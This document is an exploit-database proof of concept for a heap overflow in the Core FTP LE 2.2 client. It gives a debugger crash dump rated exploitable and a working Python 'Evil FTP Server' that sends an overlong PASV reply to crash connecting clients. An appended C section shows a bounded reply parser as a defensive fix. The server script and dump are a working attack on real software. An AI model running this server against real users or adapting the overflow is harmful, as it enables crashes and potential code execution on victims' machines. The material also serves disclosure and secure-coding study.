Core FTP LE 2.2 – Heap Overflow (PoC)

  • Author: Gabor Seljan
  • Date: 2014-06-11
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/33713/
#-----------------------------------------------------------------------------#
# Exploit Title: Core FTP LE 2.2 - Heap Overflow PoC                          #
# Date: Jun 11 2014                                                           #
# Exploit Author: Gabor Seljan                                                #
# Software Link: http://www.coreftp.com/                                      #
# Version: 2.2 build 1798                                                     #
# Tested on: Windows XP SP3                                                   #
#-----------------------------------------------------------------------------#

# In some cases the client does not do proper bounds checking on server
# responses. An overly long reply from the server causes a heap overflow and
# crashes the application. The USER, PASS, PASV, SYST, PWD and CDUP commands are
# all affected, and possibly other commands are too.

'''
HEAP[coreftp.exe]: Heap block at 00F17BC8 modified at 00F1BBD1 past requested size of 4001
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f1bbd1 ecx=7c91eab5 edx=015295ab esi=00f17bc8 edi=00004001
eip=7c90120e esp=015297ac ebp=015297b0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:002> dd eax
00f17bc8  004b0804 011f0733 20373232 41414141
00f17bd8  41414141 41414141 41414141 41414141
00f17be8  41414141 41414141 41414141 41414141
00f17bf8  41414141 41414141 41414141 41414141
00f17c08  41414141 41414141 41414141 41414141
00f17c18  41414141 41414141 41414141 41414141
00f17c28  41414141 41414141 41414141 41414141
00f17c38  41414141 41414141 41414141 41414141
0:002> g
HEAP[coreftp.exe]: Invalid Address specified to RtlFreeHeap( 00C10000, 00F17BD0 )
(9d8.9f4): Break instruction exception - code 80000003 (first chance)
eax=00f17bc8 ebx=00f17bc8 ecx=7c91eab5 edx=015295ba esi=00c10000 edi=00f17bc8
eip=7c90120e esp=015297c4 ebp=015297c8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!DbgBreakPoint:
7c90120e cc              int     3
0:002> g
(9d8.9f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f3bff0 ebx=00000000 ecx=41414141 edx=00f1bbf0 esi=00f3bfe8 edi=00c10000
eip=7c9276dc esp=01529704 ebp=015297d8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
ntdll!RtlOemStringToUnicodeString+0x277:
7c9276dc 8901            mov     dword ptr [ecx],eax  ds:0023:41414141=????????
0:002> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlOemStringToUnicodeString+0x0000000000000277 (Hash=0x72683756.0x417d7f55)

User mode write access violations that are not near NULL are exploitable.
(b58.cf0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00f1bbf0 ebx=41414141 ecx=00004141 edx=00c10608 esi=00f1bbe8 edi=41414141
eip=7c919064 esp=0152d30c ebp=0152d528 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
ntdll!RtlDosSearchPath_Ustr+0x473:
7c919064 8b0b            mov     ecx,dword ptr [ebx]  ds:0023:41414141=????????
0:002> dd eax
00f1bbf0  41414141 41414141 41414141 41414141
00f1bc00  41414141 41414141 41414141 41414141
00f1bc10  41414141 41414141 41414141 41414141
00f1bc20  41414141 41414141 41414141 41414141
00f1bc30  41414141 41414141 41414141 41414141
00f1bc40  41414141 41414141 41414141 41414141
00f1bc50  41414141 41414141 41414141 41414141
00f1bc60  41414141 41414141 41414141 41414141
0:002> dd esi
00f1bbe8  41414141 41414141 41414141 41414141
00f1bbf8  41414141 41414141 41414141 41414141
00f1bc08  41414141 41414141 41414141 41414141
00f1bc18  41414141 41414141 41414141 41414141
00f1bc28  41414141 41414141 41414141 41414141
00f1bc38  41414141 41414141 41414141 41414141
00f1bc48  41414141 41414141 41414141 41414141
00f1bc58  41414141 41414141 41414141 41414141
'''
    
#!/usr/bin/env python3

from socket import *

host = "0.0.0.0"
port = 21
payload = b"A" * 150000

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)

print("[+] Evil FTP Server started")
print("[+] Listening on port %d..." % port)

conn, addr = s.accept()
print("[+] Connection accepted from %s" % addr[0])
conn.send(b"220 Welcome to Evil FTP Server\r\n")
conn.recv(1024)  # Receive USER
conn.send(b"331 Need password for whatever user\r\n")
conn.recv(1024)  # Receive PASS
conn.send(b"230 User logged in\r\n")
conn.recv(1024)  # Receive SYST
conn.send(b"215 UNIX Type: L8\r\n")
conn.recv(1024)  # Receive PWD
conn.send(b"257 \"/\" is current directory\r\n")

try:
    print("[+] Sending evil response for 'PASV' command...")
    conn.recv(1024)  # Receive PASV
    # sendall() so the whole overly long reply is delivered, not just the first chunk
    conn.sendall(b"227 " + payload + b"\r\n")
    conn.recv(1024)
except error as e:
    if e.errno == 10054:  # WSAECONNRESET: the client dropped the connection
        print("[+] Client crashed!")
    else:
        print(e)
finally:
    conn.close()
    s.close()
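The root cause stated in the header comment is a client that copies a server reply into a fixed-size heap buffer (the crash dump shows a 4001-byte block) without checking the reply's length first. The C reader below is an added illustration of the defensive pattern, not code from the original exploit or from Core FTP: the length of a reply line is bounded before it touches any buffer, anything over the cap is refused rather than silently truncated, and the three-digit code is validated. FTP_REPLY_MAX and all test vectors are constructed values chosen for this example; the overlong case mirrors the 150000-byte "227" reply the PoC sends.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed cap for one reply line, excluding CRLF. The advisory's crash
 * dump shows a 4001-byte heap block being overrun, so 4000 is used here. */
#define FTP_REPLY_MAX 4000

typedef enum {
    FTP_OK = 0,
    FTP_ERR_TOO_LONG,       /* line exceeds FTP_REPLY_MAX or the caller's text buffer */
    FTP_ERR_MALFORMED,      /* no three-digit code followed by ' ' or '-' */
    FTP_ERR_NO_TERMINATOR   /* CRLF not seen yet; caller should read more */
} ftp_status;

/* Parse one FTP reply line ("NNN text\r\n") from a receive buffer of len bytes.
 * On FTP_OK: *code holds the numeric code, text holds the NUL-terminated message
 * (never more than textcap-1 bytes), *consumed is the number of bytes to drop
 * from the stream. The function never writes beyond text[textcap-1]. */
ftp_status ftp_parse_reply(const unsigned char *buf, size_t len,
                           int *code, char *text, size_t textcap,
                           size_t *consumed)
{
    /* Only look for CRLF within the first FTP_REPLY_MAX+1 bytes: a CR any
     * later would mean a line longer than the cap. */
    size_t scan = len < FTP_REPLY_MAX + 1 ? len : FTP_REPLY_MAX + 1;
    size_t line_len = 0;
    int found = 0;
    for (size_t i = 0; i < scan && i + 1 < len; i++) {
        if (buf[i] == '\r' && buf[i + 1] == '\n') {
            line_len = i;
            found = 1;
            break;
        }
    }
    if (!found) {
        /* More than cap+1 bytes without a terminator: the line is already too long. */
        return len > FTP_REPLY_MAX + 1 ? FTP_ERR_TOO_LONG : FTP_ERR_NO_TERMINATOR;
    }

    /* Reply code: exactly three digits, then end of line, ' ' or '-' (multi-line opener). */
    if (line_len < 3 || !isdigit(buf[0]) || !isdigit(buf[1]) || !isdigit(buf[2]))
        return FTP_ERR_MALFORMED;
    if (line_len > 3 && buf[3] != ' ' && buf[3] != '-')
        return FTP_ERR_MALFORMED;

    size_t text_len = line_len > 4 ? line_len - 4 : 0;
    /* Refuse rather than truncate: a silent cut hides the fact that the peer misbehaved. */
    if (text_len >= textcap)
        return FTP_ERR_TOO_LONG;

    memcpy(text, buf + 4, text_len);
    text[text_len] = '\0';
    *code = (buf[0] - '0') * 100 + (buf[1] - '0') * 10 + (buf[2] - '0');
    *consumed = line_len + 2;
    return FTP_OK;
}

/* Constructed input mirroring the PoC: "227 " + 150000 'A' bytes + CRLF. */
ftp_status demo_overlong_reply(void)
{
    size_t n = 4 + 150000 + 2;
    unsigned char *reply = malloc(n);
    if (reply == NULL)
        return FTP_ERR_TOO_LONG;  /* treat allocation failure as a refusal too */
    memcpy(reply, "227 ", 4);
    memset(reply + 4, 'A', 150000);
    reply[n - 2] = '\r';
    reply[n - 1] = '\n';

    char text[FTP_REPLY_MAX + 1];
    int code = 0;
    size_t used = 0;
    ftp_status st = ftp_parse_reply(reply, n, &code, text, sizeof text, &used);
    free(reply);
    return st;
}

int main(void)
{
    const char *ok = "227 Entering Passive Mode (127,0,0,1,4,1)\r\n";  /* constructed */
    char text[64];
    int code = 0;
    size_t used = 0;
    ftp_status st = ftp_parse_reply((const unsigned char *)ok, strlen(ok),
                                    &code, text, sizeof text, &used);
    printf("benign reply: status=%d code=%d text=\"%s\" consumed=%zu\n",
           st, code, text, used);
    printf("overlong reply: status=%d (1 = FTP_ERR_TOO_LONG)\n", demo_overlong_reply());
    return 0;
}
```

The caller keeps a receive buffer, calls ftp_parse_reply after every read, drops *consumed bytes on FTP_OK, reads more on FTP_ERR_NO_TERMINATOR, and tears the connection down on either error: a peer that sends a reply longer than the cap is a protocol violation worth logging, not something to accommodate. Continuation lines of multi-line replies ("NNN-") are accepted by the code check here but their assembly is left to the caller.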